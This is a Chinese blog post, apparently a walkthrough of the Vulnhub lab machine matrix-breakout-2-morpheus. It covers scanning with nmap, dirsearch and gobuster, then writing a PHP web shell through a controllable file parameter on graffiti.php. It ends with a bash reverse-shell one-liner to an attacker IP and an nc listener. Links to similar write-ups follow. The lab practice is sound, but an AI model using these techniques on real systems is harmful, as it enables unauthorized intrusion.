matrix-breakout-2-morpheus靶场

已于 2025-03-19 21:01:53 修改
阅读量299 收藏 3
点赞数 7
文章标签: 安全 web安全
于 2025-03-19 20:52:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_64470109/article/details/146378344
版权

1、安装靶机和kali,并设置为net模式,保证在同一网段下

2、kali扫描靶机

nmap 192.168.19.1/24 

3、浏览器访问靶场

4、扫出敏感目录

dirsearch -u "http://192.168.19.162"

访问一下这两个可以访问的目录

robots.txt告诉我们这里没有,看看下一个

javascript里也是什么都没有

5、扫描文件

gobuster dir -u http://192.168.19.162 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html

扫到几个文件,去访问一下

在graffiti.txt里看到了一些可能有用的信息

在graffiti.php里看到了一个输入框

我们随便输入点东西,看看是什么反应

发现输进去的东西会在页面显示出来,试一下sql注入看看

还是输出到了页面上,并不会被数据库执行

那我们抓包看一下他的包是怎么上传的

包里看到了我们输入一个1,上传到了graffiti.txt文件,我们再去访问一下刚刚的txt文件

发现这里有我们刚刚尝试输入的很多信息,说明我们上传的数值可以被传到file后的文件里,那么我们可以改包,新建一个php文件,把一句话木马写进去

放行,访问文件看看有没有上传成功

访问了我们的木马文件,没有报错,那去蚁剑测试一下连接

可以看到木马已经成功被我们上传到这个网站里,那接下来就可以反弹shell

在蚁剑的虚拟终端里写入反弹代码/bin/bash -c 'bash -i >& /dev/tcp/192.168.19.133/6666 0>&1'这里的IP是kali的IP,大家可千万不要写成靶机的IP

在kali里开启nc监听

成功

matrix-breakout-2-morpheus靶机
2401_86120759的博客
10-28 296
1.利用kali通过靶机物理地址:00:0C:29:CB:15:63获取ip地址:192.168.xxx.xxx。7.尝试上传一句话木马发现失败,使用编码可以成功,使用哥斯拉连接。10.保存会话,查找漏洞利用程序,进行漏洞利用,提权。6.尝试上传查看结果发现可以写入文件中。4.访问IP80端口没什么可利用的。8.使用哥斯拉反弹msf。找到一个可利用的信息。
matrix-breakout-2-morpheus
2401_88387979的博客
12-25 543
发现网站会将提交的内容追加到graffiti.txt文件中,由于file参数是可控的,那么我们可以修改文件名改变文件上传的路径,尝试上传一句话木马到1.php中。还是将重点放回80端口,因为robot.txt提示我们继续找找,可能是因为我们的字典太小了,我们换个扫描器换个字典试下,利用kali自带的最大的一个字典。在输入框中随便输入,发现输入的数据被显示到页面上,抓包。分别访问这几个端口,也没有什么发现,我们换个思路。我们从当前页面没有得到有用的信息,尝试扫描后台。测试连接成功,添加,成功获取权限。
Vulnhub靶场matrix-breakout-2-morpheus
qq_69775412的博客
10-17 860
简介: vulnhub是一个提供靶场环境的平台。今天从首页下载了一个来做,它叫matrix-breakout-2-morpheus
Matrix-Breakout 2 Morpheus靶场解题过程
你好
03-06 398
靶机目标很明显就是61.139.2.141了。
Matrix-Breakout: 2 Morpheus靶场攻破
2402_83946446的博客
11-26 564
Morpheus靶场
Vulnhub matrix-breakout-2-morpheus靶场攻击实战(一)
初学者
01-16 930
跟之前一样,这个靶场是笔者新找的一个靶场,笔者也没有接触过这个靶场,所以在分享过程中可能有所疏漏,希望大家可以谅解,有问题的地方指出来大家一起进步。
matrix-breakout-2-morpheus 靶场 练习思路
sn5diphone6的博客
01-02 701
x php,txt,jsp,asp -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 爆破目标机器的文件目录,找到可以访问的文件路径。http://192.168.29.130/graffiti.php 发现可以上传文件的页面以及接口。nmap -sV -A IP 查看目标机器开放的端口。执行linpeas.sh 文件,查看目标机器的漏洞。arp-scan -l 获取目标机器的IP。
Matrix-Breakout 2 Morpheus靶场
m0_73639338的博客
12-25 1085
这个工具扫出来了好几个目录和文件,我们访问一下graffiti.txt,graffiti.php 这两个文件。发现我们输入的数据是 123456 生成的文件为 graffiti.txt。发现 123456 在页面中显示出来了,我们再去访问 txt 文件。到目前为止我们没有找到任何有用的信息,我们尝试使用其他的工具。我们修改成我们的一句话木马,生成一个 123.php 文件。获取到 shell,我们找到了一个 flag 文件。我们放行,然后到网站中访问一下。我们在访问一下 php 文件。
vulnhub靶场Matrix-Breakout 2 Morpheus
qq_58091216的博客
01-31 1786
我们找到了Flag 1!,提示我们从80端口的Web服务器中提取此图像以获得另外一个flag,图像的名称叫/.cypher-neo.png,可以看到是一个隐藏文件。蚁剑的文件不是完整的,可能会有隐藏文件,此处简单一点直接在反弹shell双管齐下(一句话魔改一下)(记得要弄url编码)(干掉问号和空格和&)此处有一个file变量,那么改变file变量可以直接对靶机文件修改,能随意创建文件,二话不说写个马,准备反弹shell。截止到目前,我们没有找到任何有用的信息,我们可以换一个思路进行。
2024年网安最全【网络安全】Vulnhub靶场matrix-breakout-2-morpheus
2401_84265972的博客
05-01 899
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察。
Vulnhub中的Matrix-breakout2-Morpheus
在Web和Reverse坑里游泳中。。。。
01-20 891
又是收获满满的一周!
2024年网络安全最新【网络安全】Vulnhub靶场matrix-breakout-2-morpheus
2401_84281720的博客
05-03 859
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
vulhub靶场-matrix-breakout-2-morpheus
mashiro_hibiki的博客
03-11 429
根据提示,在 cypher-neo.png 中存在flag,但是下载图片后并没有发现什么有用的信息,查看图片的时候需要把图片前面的.去掉才能在文件夹中看到图片。这里的话需要注意,提权的话,我们需要有一个bash终端才能在提权后成功获取到root权限的bash,所以我们先用php来获取一个bash。发现开放的端口服务,可以通过爆破ssh弱口令的形式来直接获取服务器权限,但一般ssh的口令都不太好爆破,访问开放的http服务。下载完成后,在vmware中打开,选择刚刚下载的ova文件。
redis 7.4.3更新!安全修复+性能优化全解析
福大大架构师每日一题
04-25 413
Redis(Remote Dictionary Server)是一款开源的高性能内存键值数据库,支持持久化、多数据结构(如字符串、哈希、列表等),广泛应用于缓存、消息队列、实时统计等高并发场景。立即行动:若暴露在公网,需优先修复CVE-2025-21605漏洞,避免被恶意利用。• 风险描述:未授权客户端可导致输出缓冲区无限增长,可能引发内存耗尽甚至服务崩溃。典型使用场景:电商秒杀、社交热榜、会话缓存、实时数据分析等。• 丰富功能:支持事务、Lua脚本、发布订阅等。• 解决方案:升级至7.4.3,并启用。
基于STM32、HAL库的ATECC608B安全验证及加密芯片驱动程序设计
最新发布
corlin6688的博客
04-29 150
注意:ATECC608B的I2C地址通常是0x60(7位地址)基于硬件的高安全性加密算法。ECC P-256加密引擎。真随机数生成器(TRNG)I²C接口(最高1MHz)低功耗设计,适合物联网应用。SHA-256哈希算法。16KB安全存储空间。
Java 24 深度解析:云原生时代的性能更新与安全重构
qq_20294455的博客
04-25 1253
Java 24 不仅是一次版本迭代,更是 Java 平台在云原生、后量子安全和开发者生产力领域的战略布局。性能革命:通过内存优化和并发模型升级,满足超大规模系统需求。安全护航:抗量子加密技术为未来十年的信息安全提供保障。生态扩展:云原生特性巩固 Java 在分布式系统领域的统治地位。开发者关怀:语言改进和工具链升级降低开发门槛,提升效率。对于企业而言,Java 24 是构建下一代关键任务系统的必备平台;对于开发者,它是掌握前沿技术、提升竞争力的重要契机。
基于STM32、HAL库的DS2401P安全验证及加密芯片驱动程序设计
corlin6688的博客
04-28 253
1 |--DATA---------->| GPIO (配置为开漏输出)// 检测存在脉冲(设备应在60-240us内拉低总线)// 初始化DS2401P,使用GPIOB, PIN5。// 发送读取ROM命令 (0x33)// 微秒级延迟函数(需要根据系统时钟配置)// 释放总线(上拉电阻将拉高)工作温度范围:-40°C至+85°C。// 配置为开漏输出,无上拉。// 拉低总线至少480us。// 打印ROM信息。// 发送复位脉冲并检测存在脉冲。// 读取DS2401P的ROM。
企业 AD 域安全10大风险场景解析
运维有小邓
04-28 533
Active Directory(AD)作为大多数组织的信息管理中枢,在身份验证与访问控制中发挥着至关重要的作用。这也使其成为网络犯罪分子觊觎的目标,他们不断寻找漏洞以窃取关键数据。为了有效防御AD环境遭受攻击,了解常见的攻击手段以及制定全面的防护策略至关重要。本文将带你了解十大常见AD攻击类型,并介绍如何快速检测和防护。
Matrix-Breakout-2-Morpheus靶机进行渗透测试
12-13
Matrix-Breakout-2-Morpheus靶机进行渗透测试是一项复杂且具有挑战性的任务。渗透测试的目的是通过模拟黑客的攻击手段,评估系统的安全性并发现潜在的安全漏洞。以下是进行渗透测试的一般步骤和方法: ### 1. ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值